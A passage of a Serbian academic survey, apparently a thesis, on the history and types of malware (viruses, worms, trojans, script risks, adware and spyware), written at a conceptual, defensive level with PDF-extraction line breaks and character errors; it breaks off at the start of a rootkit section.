viruse Viruse koji napadaju datoteke
Funkcionisanje BSI se svodi na inficiranje svakog diska ili diskete koja se naĎe u
kontaktu sa zaraţenim sistemom. Ovi virusi kopiraju sebe u boot sektor diska, a d
a bi prikrili svoje aktivnosti deo sa boot sektora izmeštaju na drugu lokaciju. Pr
i svakom pokretanju diska, prvo bi se učitavali podaci iz boot sektora, tačnije viru
s, koji je nakon izvršenja svojih aktivnosti pokretao prvobitno delociran sadrţaj bo
ot
S t r a n a | 19
sektora. Korisnik na ovaj način nije mogao da pretpostavi da se na njegovom sistem
u nalazi virus. Virusi koji napadaju datoteke čuvaju svoj programski kod unutar iz
vršne datoteke i na taj način obezbeĎuju svoje izvršavanje pri pokretanju inficiranog pr
ograma. Na DOS operativnim sistemima postoje tri tipa izvršnih datoteka u kojima s
e mogu infiltrirati ovakvi virusi: bat, com i exe. Ukoliko bi virus svoje telo i
skopirao na početak ili kraj izvršne datoteke, takav virus bi bilo moguće ukloniti. Pr
oblem su predstavljali virusi koji su svoj kod kopirali na proizvoljno mesto u i
zvršnoj datoteci uz uklanjanje dela programskog koda. Ovo je za posledicu imalo tr
ajno uništenje inficiranog programa. Karakterističan predstavnik grupe virusa koji p
repisuju podatke je Phoenix. Šteta je ne pomenuti virus Lening koji je koristio pr
opust u Command.com datoteci, tačnije prazan prostor na njenom kraju, da bi se inf
iltrirao u nju bez izmene njene duţine. DOS virusi su imali na raspolaganju tri vr
emenska intervala za infekciju drugih diskova ili programa. Na osnovu toga ih moţe
mo podeliti u tri grupe: One shot - odmah nakon pokretanja virusa While called -
pri svakom pokretanju inficiranog programa Memory resident – virusi nastanjeni u
memoriji, pokreću se samovoljno
Naravno, metoda sa virusom u memoriji pokazala se najefikasnijom i autori virusa
su je najradije primenjivali. Joshi virus je primer memorijskog virusa, koji je
imao mogućnost preţivljavanja restarta sistema. Virus bi se infiltritao u Ctrl+Alt+
Del funkciju operativnog sistema i pri njenom aktiviranju izvršio neophodne radnje
potrebne za preţivljavanje.
Slika 3.1 Virus Joshi – preuzeto iz (Ždrnja, 2003)
S t r a n a | 20
Dolazak Windows operativnih sistema doneo je velike probleme tvorcima virusa, ug
lavnom zbog promene načina podizanja sistema. Većina starih DOS virusa nije radila v
eć pod Windows 95 operativnim sistemom. Tehnike skrivanja pod DOS operativnim sist
emima ovde više nisu funkcionisale. Svet virusa je pretrpeo drastične promene i prot
eklo je dosta vremena dok se tvorci virusa nisu navikli na novo okruţenje. Anxiety
porodica virusa, koja se pojavila 1997. godine, se smatra prvom veće rasprostranj
enom grupom 32-bitnih virusa. Ovaj virus je koristio propust Windows 95 operativ
nih sistema da bi se upisao u memorijsko područje kernela. Glavno sredstvo za širenj
e virusa prestaju da budu diskete. Počinje masovnije korišćenje lokalnih mreţa, Internet
a i elektronske pošte kao novih načina za prenos virusa. Magistr-A predstavlja polim
orfni virus koji inficira Windows 32-bitne programe, a širi se klasičnim inficiranje
m izvršnih datoteka, ali i putem elektronske pošte. Ovaj virus je bio izuzetno destr
uktivan, pored brisanja datoteka na lokalnim i mreţnim diskovima, pokušavao je prepi
sivanje podataka u BIOS-u. Vremenom su virusi prevazišli ograničenje vrste operativn
ih sistema. W32.Esperanto je bio računarski virus koji je bio u stanju da zarazi r
ačunare pod DOS (com i exe), Windows 95 i Windows NT operativnim sistemima.
3.2 Linux virusi
Iako je prvi eksperimentalni Cohen-ov virus bio implementiran i testiran na UNIX
operativnom sistemu, dugo se verovalo da računar pod Linux operativnim sitemom ne
moţe biti zaraţen virusom. Razlog za takvo verovanje temeljio se na načinu na koji Li
nux dafiniše korisnička prava pristupa datotekama. Za razliku od Windows operativnih
sistema, čiji korisnici uglavnom koriste administratorska prava, obični korisnici L
inux sistema nemaju pravo menjanja sistema datoteka. Virus pokrenut pod ovim sis
temom ne moţe zaraziti sistemsku datoteku, jer ni sam korisnik nema pravo izmene t
e datoteke. Godine 1995. otkriven je prvi virus koji je napadao računare pod Linux
operativnim sistemom. Ovim se ruše svi snovi o operativnom sistemu otpornom na vi
ruse i ostale maliciozne programe. Bliss [23] predstavlja jedan od prvih virusa
na Linux operativnim sistemima. Ovaj virus napada izvršne datoteke tipa ELF i infi
ltrira se u svaku izvšnu datoteku nad kojom ima pravo pisanja. Pošto normalni korisn
ici Linux operativnog sistema retko kad imaju pravo pisanja po izvršnim datotekama
Bliss virus nije uspevao da se proširi. Virus je nudio jednu zanimljivu mogućnost,
samouništenje pozivom komande: $ program –bliss –disinfect –filed –pleas
S t r a n a | 21
Današnji korisnici Linux računara retko se susreću sa pravim virusima. Uglavnom iz raz
loga nemogućnosti izmene izvršnih datoteka, a samim tim i nemogućnosti infiltracije vi
rusa u iste. Mnogo veća opasnost za njih predstavljaju računarski crvi, za koje po d
efiniciji nije neophodan nosilac. Za Linux operativni sistem crvi predstavljaju
samo automatizovane neovlašćene korisnike koji su u stanju da se šire velikom brzinom.
Većina današnjih kompanija, koje proizvode antivirusne pakete, nude programe za zašti
tu od virusa za računare pod Linux operativnim sistemom. MeĎutim, u praksi se ovi pr
ogrami retko upotrebljavaju. Bezbednost se uglavnom svodi na onemogućavanje napada
redovnom instalacijom bezbednosnih zakrpa. Zbog ovako loše prakse, nije redak sluča
j da upravo Linux sistemi, pod kojima rade mnogi mreţni serveri, predstavljaju mes
to ulaska virusa u računarsku mreţu. Virus koji na ovaj način uĎe, moţe biti standardni Wi
ndows virus. On neće uspeti da inficira pomenuti sistem, ali će putem inficiranja de
ljivih datoteka sistema uspeti da inficira ostale računare na mreţi.
3.3 Makro virusi
Prvi makroi su imali za cilj da omoguće korisnicima automatizaciju često ponavljanih
aktivnosti, najčešće prostim snimanjem akcija. Vremenom je omogućeno programiranje makr
oa (npr. Microsoft Visual Basic), čime su stvoreni uslovi za razvoj zlonamernih pr
ograma na tim paketima. Kao najčešći oblik zlonamernih programa, kreiranih uz pomoć makr
oa, javljaju se makro virusi [24]. Pored makro virusa često se javljaju makro troj
anski konji, kao i generatori makro virusa. Svaki programski paket koji dopušta sn
imanje akcija koje se sprovode ili dela programskog koda u neki dokument potenci
jalne su mete makro virusa. Naravno, najrasprostranjeniji programi sa pomenutim
osobinama su svakako oni iz programskog paketa Microsoft Office, te zbog toga ne
čudi što su makro virusi najprisutniji upravo na njima. Karakteristika makro virusa
je da su oni za razliku od klasičnih virusa, vezani za aplikaciju, a ne za operat
ivni sistem ili platformu. Mada, u praksi se dešava da makro virusi ponekad imaju
problema da preĎu na drugu platformu, te se ovo pravilo ne moţe u potpunosti ispoštova
ti. Microsoft Word kao najistaknutiji primerak Office paketa, je program za koji
je pisan najveći broj makro virusa. Tri grupe makro virusa koje pogaĎaju ovu aplika
ciju su posebno bitne: Makroi koji se izvode pri pokretanju Worda (npr. AutoExec
) Automatski makori (npr. AutoNew, AutoOpen, AutoClose, AutoExit ...) Makroi sa
imenom naredbi (npr. FileSave )
Od verzije Microsoft Office XP omogućena je autentifikacija makroa na osnovu digit
alnog potpisa. Digitalni potpis u slučaju makroa omogućava njihovu identifikaciju, a
samim tim i bezbedno pokretanje. Po osnovnim podešavanjima, program veruje samo m
akroima koji su potpisani od strane ovlašćenog tela za
S t r a n a | 22
izdavanje sertifikata (engl. CA - Certificate Autority). U slučaju nepotpisanih ma
kroa, korisnik sam odlučuje o tome da li će im dozvoliti izvršavanje. Na ovaj način spreča
va se pokretanje makro virusa, bez eksplicitne dozvole korisnika. Prvi makro vir
us koji se pojavio bio je WM/Concep. Ovaj virus nije imao nikakvu nosivu kompone
ntu, nego je samo inficirao fajlove. Veruje se da je sam Microsoft projektovao o
vaj virus. WM/Nuclear predstavlja virus sastavljen iz dva dela (Makro virusne ko
mponente i DOS/Windows virusne komponente). Makro virus komponenta sadrţi veći broj
makroa AutoExec, AutoOpen, FileSaveAs, FilePrint, FileExit. Pri otvaranju infici
ranog dokumenta, virus će pokušati da inficira NORMAL.DOT datoteku modela i ukloni s
tavku “Prompt to save NORMAL.DOT”, kako bi prikrio svoje postojanje. Virus takoĎe menj
a makro FileSaveAs, čime se dobija mogućnost inficiranja svakog dokumenta koji se ţeli
sačuvati na sistemu. WM/Nuclear je namešten da bude izrazito destruktivan, ali većina
njegovih funkcija nije ispravno radila. Jedinu štetu koju je uspeo da nanese je i
zmena dokumenta i dodavanje teksta na kraju dokumenta: And finally I would like
to sey: STOP ALL FRENCH NUCLEAR TESTING IN PACIFIC W97M/Melissa [25] makro virus
je ostao zapamćen po brzom širenju. Distribuirao se putem članka u alt.sex NNTP grupi
i sadrţao je Word dokumenat koji je bio inficiran Melisa virusom. Virus bi nakon
pokretanja čitao iz Microsoft Outlook-a 50 adresa elektronske pošte i na njih slao i
nficirana dokumenta. Iako je virus ţiveo samo devet dana (zbog prevelike medijske
paţnje), efekat širenja je bio iznenaĎujuće dobar, a Melissa virus postaje uzor budućim vi
rusima.
3.4 Skript virusi
Skript virusi su podskup virusa koji napadaju sisteme datoteka. Pisani su u skri
pt jezicima kao na primer Visual Basic Script, Java Script, BAT, PHP. Ovi virusi
su sposobni da inficiraju datoteke u drugom formatu, kao što je HTML, ukoliko dat
oteke tog formata dozvoljavaju izvršavanje skripta.
3.5 Destruktivnost virusa
Jedno je sigurno, što je virus destruktivniji, to dobija veću medijsku paţnju. MeĎutim,
da bi virus uspeo da se proširi, poţeljno je da što duţi vremenski period ostane neotkri
ven. Virus koji se destruktivno ponaša će lako biti zapaţen. Iz tog razloga autori vir
usa najčešće ne implementiraju nosivu komponentu, zaduţenu za destruktivnost virusa. Iak
o neki virusi ne poseduju implementiranu nosivu komponentu, oni je ipak indirekt
no poseduju. Svaki virus na računaru zauzimanjem memorijskog prostora i trošenjem pr
ocesorskog vremena, u stvari destruktivno deluje na sam računar.
S t r a n a | 23
Postepeno menjanje i uništavanje podataka na računaru smatra se najgorim oblikom des
truktivnog ponašanja virusa. Ova tvrdnja moţe se dokazati na osnovu Dark Avenger vir
usa [26], koji je brisao uglavnom slične delove fajlova. Na ovaj način su čak i korisn
ici koji su redovno bekapovali podatke, u slučaju infekcije ovim virusom, trajno o
stajali bez dela istih. Osobina virusa da modifikuju podatke posebno je izraţena k
od Makro virusa. Tako modifikovani podaci mogu predstavljati neispravne podatke,
što potencijalno moţe biti opasnije od samog brisanja. Prvobitni podaci se najčešće ne mo
gu povratiti. Infiltrirani virus ima neograničene mogućnosti delovanja na inficirano
m računaru. Sve što moţe da uradi običan program moţe i virus. Na primer brisanje ili prep
isivanje podataka, menjanje informacija, ubijanje procesa drugih programa, forma
tiranje diska… Kada virus dospe u sistem, on neminovno napravi neku vrstu štete. Štete
nastale radom virusa mogu se podeliti na: Primarnu štetu – nastaje isključivo pokreta
njem virusa i izvršenjem njegove nosive komponente. Virus po definiciji ne mora po
sedovati nosivu komponentu, pa tako ne mora ni izazivati ovakvu štetu. Sekundarnu št
etu – svaki vid štete koji nastaje kao posledica delovanja virusa, a nije u vezi sa
izvršnom komponentom. Primeri ove štete su zauzimanje memorijskog prostora, zagušenje
mreţe, zauzeće procesora itd.
Svojim delovanjem virusi narušavaju tri klasične komponente sigurnosti podataka: Pov
erljivost podataka – kraĎa šifara, kraĎa privatnih informacija… Integritet podataka – menja
je podataka, prepisivanje podataka… Dostupnost podataka – brisanje podataka, enkripc
ija podataka…
Medijski vrlo akutelna, hardverska šteta u stvarnosti predstavlja vrlo redak slučaj
nanošenja štete dejstvom virusa. Treba napomenuti da još ne postoje virusi koji fizički
oštećuju hardver, već virusi koji svojim dejstvom, koje se uglavnom svodi na prepisiva
nje sadrţaja BIOS-a, dovode fizičke komponente u neupotrebljivo stanje. Ovaj problem
je efikasno rešen uvoĎenjem Dual – BIOS sistema bezbednosti, gde se jednostavnim akti
viranjem prekidača vrši kopiranje podataka iz rezervnog BIOS-a u primarni (oštećeni) BIO
S.
S t r a n a | 24
4. CRVI
Crv [2] (engl. worm) predstavlja samostalni (engl. stand-alone) program, ili sku
p programa, koji se šire s jednog računara na drugi. Upravo osobina samostalnosti je
ono što ih razlikuje od virusa, jer za njihovo prenošenje nije potrebna nikakva dat
oteka. Internet, kao najveća globalna mreţa, predstavlja optimalan medij za širenje cr
va. Uobičajene metode prenošenja na ţrtvu jesu upotreba elektronske pošte i Internet ser
visa (FTP, HTTP). Razlikujemo dve vrste crva: Crvi na računaru domaćina (engl. Host
computer worms) Mreţni crvi
Crvi na računaru domaćina nalaze se na računaru na kome su pokrenuti, a mreţnu komunikac
iju upotrebljavaju samo za širenje. Mreţni crvi se sastoje od višestrukih delova, od k
ojih je svaki pokrenut na drugom računaru u mreţi. Mreţa se upotrebljava za komunikaci
ju meĎu delovima. Ukoliko mreţni crv poseduje glavni deo koji upravlja radom drugih
delova crva, tada ga nazivamo hobotnicom (engl. Octopus). Širenje crva se moţe klasi
fikovati prema transportnom mehanizmu i načinu pokretanja. Podela crva prema trans
portnom mehanizmu: Prenos putem elektronske pošte (engl. e-mail worms) Pren
m instant poruka (engl. IM worms) Prenos putem Interneta (FTP i HTTP protokola)
Prenos putem deljenja datoteka (engl. file-sharing) Prenos putem razmene datotek
a izmeĎu ravnopravnih računara (P2P crvi) Crvi koji se sami pokreću Crvi koje pokreću ko
risnici - koristi ranjivost ţrtve ili koristi metode prevare i obmanjivanja, pozna
te kao društveni inţenjering (engl. social engineering), kako bi naterao korisnika d
a ga pokrene. Hibridni crvi – koriste kombinaciju samostalnog pokretanja i pokreta
nja od strane korisnika
Podela crva prema načinu pokretanja:
Crvi koji se šalju putem elektronske pošte, vrlo brzo se mogu raširiti, najčešće u toku jed
og dana. Iz tog razloga ovi crvi predstavljaju najrasprostranjeniji metod transp
orta. E-mail crvi koriste e-mail klijente (npr. Microsoft Office Outlook) na kor
isnikovom računaru, da bi došli do liste adresa. U slučaju da ih pronaĎe, šalje inficirane
poruke na adrese koje je pronašao. Postoje i crvi koji koriste mnogo sofisticiran
ije vrste pribavljanja e-mail adresa, poput pretrage istorijata web stranica int
ernet pretraţivača, koje neretko sadrţe e-mail adrese.
S t r a n a | 25
Ukoliko korisnik uspe da uz pomoć antivirusnog programa blokira upad e-mail crva,
on najčešće neće biti u stanju da detektuje odakle je inficirana poruka došla i upozori ko
risnika čiji je sistem zaraţen. Razlog ovome je mogućnost promene sadrţaja adrese pošiljao
ca (engl. From) pri slanju pošte, što ovakvi crvi često praktikuju. Na ovaj način crv do
bija na vremenu, oteţavanjem lociranja izvora širenja zaraze. Jedini pouzdan način det
ekcije pošiljaoca je pregled zaglavlja poruke elektronske pošte, u kome se moţe pronaći
IP adresa sa koje je e-mail poruka poslata.
Slika 4.1 Zaglavlje poruke – Microsoft Outlook
4.1 Poznati crvi
Moris Worm [12] predstavlja jednog od prvih računarskih crva koji je distribuiran
preko Interneta. Crv je pušten od stane Roberta Morrisa 1988. godine. Napadao je U
nix operativne sisteme, a za napad je koristio nekoliko tehnika napada: provalji
vanje jednostavnih lozinki u lokalnoj pw datoteci, korišćenje propusta u finger daem
on-u i eksploatisanje debug trapdoor-a u sendmail daemon-u. U slučaju da neki od n
apada uspe, crv bi se dalje replicirao.
S t r a n a | 26
ILoveYou ili LoveLetter [27] je jedan od VBS crva koji se brzo raširio. Pojavio se
2000. godine i uspeo je da zarazi na desetine miliona računara pod Windows operat
ivnim sistemom. Glavnu ulogu u brzom širenju ovog crva, kao kod mnogih koji će se ja
vljati kasnije, odigrala je takozvana “komponenta socijalnog inţenjeringa”. Crv je dol
azio u prilogu elektronske pošte, koja je bila Visual Basic Script datoteka pod im
enom LOVE-LETTER-FOR-YOU.TXT.vbs, a sama pošta bila je naslovljena sa “I Love You”. Dv
ostruka ekstenzija omogućila je prekrivanje prave funkcionalnosti priloga elektron
ske pošte (Windows naravno detektuje samo poslednju ekstenziju, u ovom slučaju vbs).
Crv bi pri upadu na računar menjao Registry bazu kako bi omogućio svoje pokretanje
pri podizanju računara. Nakon toga pokušavao bi da inficira datoteke tipa VBS,VBE, J
S, JSE, CSS, WSH, JPG, JPEG, MP2 i MP3. Nakon uspešne infekcije računara crv bi na v
iše načina pokušavao da se proširi: pristupao Outlook-u i slao poštu (koja bi sadrţala njeg
vu kopiju) na sve dostupne adrese, pokušavao prenos putem IRC-a, pokušavao skinuti t
rojanske konje zadavanjem početne stranice u Internet Explorer-u... Anna Kournikov
a [28] je sledeći crv zasnovan na socijalnom inţenjeringu i predstavlja enkriptovani
crv napisan u Visual Basic-u, koji se širio upotrebom Microsoft Outlook aplikacij
e. Samo telo se nalazilo u datoteci koja je dolazila uz poruku, a nosila je nasl
ov AnnaKournikova.jpg.vbs. Godine 2001. ovaj crv se za samo nekoliko sati raširio
po celom svetu. Najgore u svemu ovome je da je crv Anna Kournikova kreiran upotr
ebom alata za generisanje virusa.
Slika 4.2 Crv Anna Kournikova
S t r a n a | 27
SQL Slammer [29] se pojavio 2003. godine, a koristio je sigurnosne propuste na M
icrosoft SQL Serveru 2000 (iako je 6 meseci pre pojave virusa kompanija Microsof
t izbacila zakrpu za ovaj problem), i svoju veličinu od svega 376 bajta za brzo šire
nje. Crv se toliko raširio da je uspeo da zaguši ceo Internet saobraćaj i onesposobi m
noge mreţe i servise na njemu. SQL Slammer nije inficirao datoteke na računaru, a pošt
o se nalazio samo u operativnoj memoriji, restartom računara crv bi bio uklonjen s
a njega.
Slika 4.3 Rasprostiranje SQL Slamera – preuzeto iz [30]
S t r a n a | 28
5. TROJANSKI KONJI
Trojanski konji [3] (engl. Trojan horses) ili kraće trojanci, su programi koji se
maskiraju i reklamiraju kao korisni programi, sa namerom da ubede (prevare) kori
snike da ih pokrenu. Ono što trojance razlikuje od virusa i crva je nemogućnost repl
ikacije, tačnije oni se mogu prenositi sa računara na računar samo putem aktivnosti sa
mog korisnika. To znači da ovaj tip zlonamernih programa ne poseduje infekcijsku k
omponentu, tj. funkcije za inficiranje drugih programa. Trojanski konji koji usp
evaju da se infiltriraju u sistem, najčešće će pokušati da ukradu korisne informacija od k
orisnika, kao na primer lozinke. TakoĎe, često korišćena mogućnost trojanaca je takozvani “
ackdoor” ili omogućavanje neovlašćenog pristupa i kontrole računara od strane neautorizova
nog korisnika, a da legitimni korisnik toga nije svestan. Uskršnja jaja [31], [32]
(engl. Easter eggs) ili funkcije programa koje su skrivene i nisu njegova osnov
na namena, ne smatraju se trojanskim konjima. Ove funkcije prave programeri, najčešće
radi zabave, i ne poseduju nikakav zlonameran deo koda.
Slika 5.1 The Word 97 Pinball & Windows 98 credits easter egg – preuzeto iz [32] D
a bi se trojanac ubacio u sistem, on na neki način mora ubediti korisnika da ga sn
imi na njega. U tu svrhu se najčešće koriste drugi „korisni” programi, koji pored osnovnih
funkcija izvršavaju još neke, u pozadini skrivene funkcije. Distribucija trojanskih
konja obično se obavlja putem piratskih programa, koji se distribuiraju preko saj
tova www.rapidshare.com, www.piratebay.com i sličnih. Korisnici koji preuzimaju ne
licencirane programe ili generatore ključeva za pomenute programe, laka su meta za
trojance. Često takve programe postavljaju sami proizvoĎači u nameri da odvrate koris
nike od nelegalnog korišćenja njihove intelektualne svojine.
S t r a n a | 29
Svi trojanski konji poseduju jednu zajedničku osobinu, prikrivenost. Od toga kolik
o je trojanac sposoban da sakrije svoje prisustvo na sistemu od korisnika, zavis
iće njegov uspeh ili neuspeh.
5.1 Login
Klasičan primer trojanskog konja je Login trojanski konj, koji simulira izgled for
me za prijavu korisnika. Trojanac blokira pokretanje nekog servisa ili programa,
a umesto njegove forme za logovanje pokreće svoju, koja izgleda identično kao forma
programa preko koje je korisnik ţeleo da se prijavi na sistem. Pošto korisnik nije
u stanju da uoči potencijalnu opasnost, on unosi svoju šifru, koja završava negde u me
moriji trojanca. Trojanski konj potom pokreće pravu aplikaciju i dalje distribuira
unetu lozinku osobi koja ga je postavila. Korisnik koji je ţrtva ovog napada najčešće n
ije ni svestan šta se desilo, sve do trenutka kada osoba koja je izvela napad ne o
dluči da iskoristi ukradenu šifru.
Slika 5.2 Primeri zaraženih servisa poznatih banaka – preuzeto iz [33]
S t r a n a | 30
5.2 Backdoor
Backdoor [34] programi su često upotrebljavana vrsta trojanskih konja, a omogućavaju
udaljenom korisniku da pristupi inficiranom računaru i to tako da vlasnik računara
nije u stanju da uoči “posetioca”. Grupu takvih programa predstavljaju RAT (engl. Remo
te Access Tools) programi, koji omogućavaju potpunu kontrolu nad računarom sa udalje
nosti. Trojanac Back Orifice 2K [35], [36] (BO2K) je karakterističan predstavnik o
ve grupe alata. Iako u početku zamišljen kao alat za pomoć administratorima, njegovu o
sobinu neovlašćenog pristupa udaljenom računaru ubrzo počinju da upotrebljavaju zlonamer
ni korisnici.
Slika 5.2 BO2K 1.1.5 Server & Client – preuzeto iz [37] Naročito popularne vrste bac
kdoor programa su DoS [5] i DDoS agenti. Ovi agenti dolaze najčešće kao komponenta nek
og backdoor trojanskog konja i postavljaju se na što veći broj računara. Nakon njihovo
g sinhronizovanog pokretanja, od strane osobe koja ih je poslala ili nekog dogaĎaj
a, slanjem velikog broja zahteva na adresu nekog servisa, dolazi do njegovog zag
ušenja (ili zagušenja celokupnog saobraćaja mreţe).
5.3 Joke
Najbezazlenija grupa trojanskih konja je takozvana „Joke“ grupa. Ovi trojanci su pis
ani iz čiste zabave, a namera njihovih autora je da se našale sa ţrtvom. Programi iz o
ve grupe ne sadrţe nikakav maliciozni kod, već se uglavnom zasnivaju
S t r a n a | 31
na prikazu poruke (obično problematičnog sadrţaja). Bez obzira na sve, antivirusni pro
grami će ih detektovati kao joke trojance i sprečiti njihovo izvršavanje.
Slika 5.3 Joke trojanac u akciji
5.4 NetBus alatka
NetBus [38], [39] trojanski konj isprva je zamišljen za legitimnu upotrebu, poput
njegovog prethodnika BO2K i mnogih drugih trojanaca. U poreĎenju sa Back Orifice t
rojancem poseduje mnogo veći set funkcija, koje mu omogućavaju pristup svim podacima
na računaru i mogućnost kontrole pojedinih funkcija Windows operativnog sistema. Pr
ogram NetBus se sastoji iz klijentskog i serverskog dela. Serverski deo se insta
lira na ciljani računar, a klijentski na računar sa koga se vrši kontrola (napad). Da
bi napadač uspeo da instalira serversku komponentu na ciljani računar, mora ubediti
stvarnog korisnik da je instalira. Distributeri NetBus-a u tu svrhu obično koriste
laţna aţuriranja za popularne programe.
S t r a n a | 32
Slika 5.4 NetBus i NetBus Pro klijentske aplikacije – preuzeto iz [38] i [39] Najb
olja zaštita od trojanskih konja je prevencija, tj. onemogućavanje njihovog upada, i
nstalacijom antivirusnih programa i podizanjem firewall-a. OdreĎeni broj trojanaca
ima mogućnost onesposobljavanja sistema zaštite ukoliko se naĎe u sistemu. Naknadno u
klanjanje i detekcija infiltriranih trojanaca sa ovom osobinom je dodatno oteţana,
a ponekad i nemoguća.
S t r a n a | 33
6. PROBLEMATIČNE KOMPONENTE
Problematične komponete same po sebi predstavljaju korisne komponente, koje zlonam
erni korisnici koriste da bi zaobišli bezbednosne mehanizme računara. Neke poznate k
omponete koje se često upotrebljavaju za izvoĎenje zlonamernih radnji, biće obraĎene u o
vom poglavlju.
6.1 Java skript
Godine 1995. Natscape predstavlja jednostavan skript jezik (Java Script) [40], z
asnovan na Java sintaksi. Kod se postavlja direktno u html stranicu i omogućava bo
lju interakciju stranice sa korisnikom. Sigurnosni model JavaScript-a sluţi za ogr
aničavanje aktivnosti koje moţe izvršiti neka skripta. Za implementaciju ovog modela s
u zaduţeni web pretraţivači, te se neretko dešava da ova komponenta nije ispravno implem
entirana. Loša implementacija sigurnosnog modela omogućava pokretanje zlonamernih Ja
vaScript programa, na nekim od stranica Internet pretraţivača. Klasičan primer zloname
rnog JavaScript programa, predstavljaju skriptovi za kraĎu šifara, takozvani logeri.
Ovi programčići uz pomoć JavaScript-a simuliraju prozor za logovanje i na taj način dol
aze do ţeljenih šifara korisnika. Ta vrsta napada se najčešće koristi na javnim servisima
poput web klijenta elektronske pošte.
Slika 6.1 Firefox - Podešavanje prava JavaScript kontrole
S t r a n a | 34
6.2 ActiveX kontrole
ActiveX [41] predstavlja tehnologiju razvijenu od strane Microsoft-a, koja dozvo
ljava dinamičko menjanje stranica. Glavna mana komponenata izraĎenih u ovoj tehnolog
iji je što, za razliku od Java Script-a, ActiveX komponente moţete pokretati samo po
d Windows operativnim sistemom. Iz tog razloga ActiveX komponente nisu dostigle
popularnost Java Script-a. Iako se sigurnosna komponenta ActiveX kontrola zasniv
a na principu digitalnih potpisa, o krajnjoj akciji instaliranja neke sumnjive k
ontrole odlučuje sam korisnik. Pri instaliranju komponente, neophodno je proveriti
njen identitet, pošto komponente koje nisu potpisane mogu da sadrţe problematičan kod
. Ukoliko se ActiveX komponenta ipak intalirana, ona dobija neograničena prava na
računaru. Najčešće uz problematične ActiveX komponente dolaze spajver [6] (engl. Spyware)
programi.
Slika 6.2 IExplorer - Podešavanje prava ActiveX kontrole
6.3 VB skript
Još jedan skript jezik koji se moţe upotrebljavati u html dokumentima je VB Script [
42], [43]. Kreirao ga je Microsoft i zasnovan je na programskom jeziku Visual Ba
sic. Za razliku od Java skripta, ovaj skript moţe komunicirati sa ActiveX kontrola
ma i na taj način iskoristiti eventualne propuste u njima (primer: Kak worm [44]).
VB skript ne poseduje specijalni sigurnosni model, već su iz njega uklonjene sve
potencijalne opasnosti, kao na primer operacije sa datotekama ili izvršavanje
S t r a n a | 35
DLL koda. Sam skript je sveden na pristupanje podacima u html dokumentu, što uključu
je i ActiveX kontrole. Kako ActiveX kontrole nisu ponekad dobro implementirane,
javljaju se potencijalne rupe u sigurnosti sistema. Problemi ove prirode se uočava
ju čak i kod potpisanih ActivX kontrola. Redovno instaliranje bezbednosnih zakrpa
je jedno od mogućih rešenja ovog problema.
S t r a n a | 36
7. PARAZITSKI PROGRAMI
Programi koji se distribuiraju i instaliraju zajedno sa nekom korisnom aplikacij
om, a koji narušavaju privatnost korisnika, troše resurse procesora ili zauzimaju me
sto na disku i sve to bez znanja korisnika, zajedničkim imenom se nazivaju parazit
ski programi. Ovi programi ne nanose nikakvu štetu sistemu, ako izuzmemo trošenje re
sursa računara, a njihova aktivnost se najčešće svodi na reklamiranje proizvoda firme ko
ja ih distribuira. MeĎutim ako se instaliraju na sistem, parazitski programi dobij
aju sva prava poput bilo kog drugog programa, te na taj način mogu predstavljati p
otencijalnu opasnost po bezbednost samog sistema. Postoji nekoliko grupa parazit
skih programa: Adware, Spyware i tajne mreže.
7.1 Adware
Adware [7] spada u najpoznatije parazitske programe. Najčešće se javlja u obliku JavaS
crit koda zaduţenog za prikaz reklama na Internetu. Osnovna namena takvih programčića,
pored reklamiranja, je da prikupljaju informacije o korisniku, uz pomoć kolačića (eng
l. Cookie). Tako prikupljene podatke adware šalje kompaniji koja ga je postavila,
na dalju analizu. Kompanije su na ovaj način u mogućnosti da analiziraju navike kori
snika i prilagode reklamu svakom korisniku (ciljane reklame). Na primer, ukoliko
korisnik često posećuje sajtove za prodaju automobila, na sajtu će se korisniku prika
zivati reklame sa tom sadrţinom. Posebnu podkategoriju adware programa čine aktivni
adware programi. Ovaj adware se nalazi na računaru korisnika, na kome se aktivira
i prikazuje raklame kada se ispune zadati uslovi. Aktivan adware najčešće sadrţi ličnu baz
u reklama, koju osveţava kada se računar poveţe na Internet. Na ovaj način program je u
stanju da prikazuje reklame i kada računar nije na mreţi.
7.2 Spyware
Spyware [6] programi su zaduţeni za tajno nadgledanje aktivnosti korisnika, na čijem
su računaru instalirani. Da bi došli do podataka o koristiku, spyware programi kori
ste slične metode kao adware programi, sa tom razlikom što spyware programi aktivno
nadgledaju sve aktivnosti korisnika i šalju podatke na udaljenu lokaciju. Ovi prog
rami neretko pregledaju datoteke na korisnikovom računaru u potrazi za aktivnostim
a korisnika. Svaki program koji pregleda korisnikov računar ili mreţne resurse, u po
trazi za ličnim podacima korisnika, a bez korisnikove eksplicitne dozvole, moţemo sm
atrati spyware programom.
S t r a n a | 37
7.3 Tajne mreţe
Tajne mreţe (engl. Stealth network) su mreţe računara koje dele specifične vrste informa
cija. Ove mreţe koriste standardnu mreţnu infrastrukturu za komunikaciju, ali se pon
ašaju kao nezavisne mreţe. Obično rade po sistemu peerto-peer pri meĎusobnoj razmeni dat
oteka. Da bi funkcionisale, na svakom računaru mora biti instalirana odgovarajuća ap
likacija, koja omogućava da računar postane deo mreţe. Klasičan primer takve aplikacije
je program Strong DC++.
Slika 7.1 Stealth network – Strong DC++ Ukoliko korisnik zatreţi neku datoteku, zaht
ev se prosleĎuje ostalim računarima u mreţi. Najčešće unutar mreţe postoji serverski računa
kome se nalaze katalozi deljenih datoteka svih računara unutar mreţe. Nakon toga ko
risnik dobija listu lokacija na kojima je dostupna traţena datoteka. Korisnikov raču
nar uspostavlja konekcije ka tim lokacijama i započinje preuzimanje. U slučaju posto
janja više različitih lokacija, radi se sinhronizovano preuzimanje blokova podataka
sa svih lokacija istovremeno, radi podizanja brzine protoka. Ključni sigurnosni pr
oblem ovakvih mreţa predstavlja mogućnost snimanja i izmene podataka na drugom računar
aru unutar mreţe. Tajne mreţe su izuzetno ranjive, a samim tim i pogodne za lansiran
je malicioznih programa.
S t r a n a | 38
7.4 Detekcija i uklanjanje parazitskih programa
Uklanjanje parazitskih programa sa računara često predstavlja problem. Tvorci ovih p
rograma se trude da svoj program dobro sakriju ili do te mere integrišu u legitima
n program, da njegovo uklanjanje iz sistema kao rezultat ima uništenje legitimnog
programa. Najlakši način za uklanjanje parazitskih programa je upotreba nekog od sof
isticiranih programa koji se bavi time. Ad-Aware [45] kompanije LavaSoft je doba
r primer takvog programa.
Slika 7.2 LavaSoft Ad – Aware
S t r a n a | 39
8. ROOTKIT
Rootkit [46], [47] predstavlja komplet (engl. kit) koji se sastoji od malih i ko
risnih programa koji omogućavaju napadaču da odrţava pristup root-u, korisniku sa najv
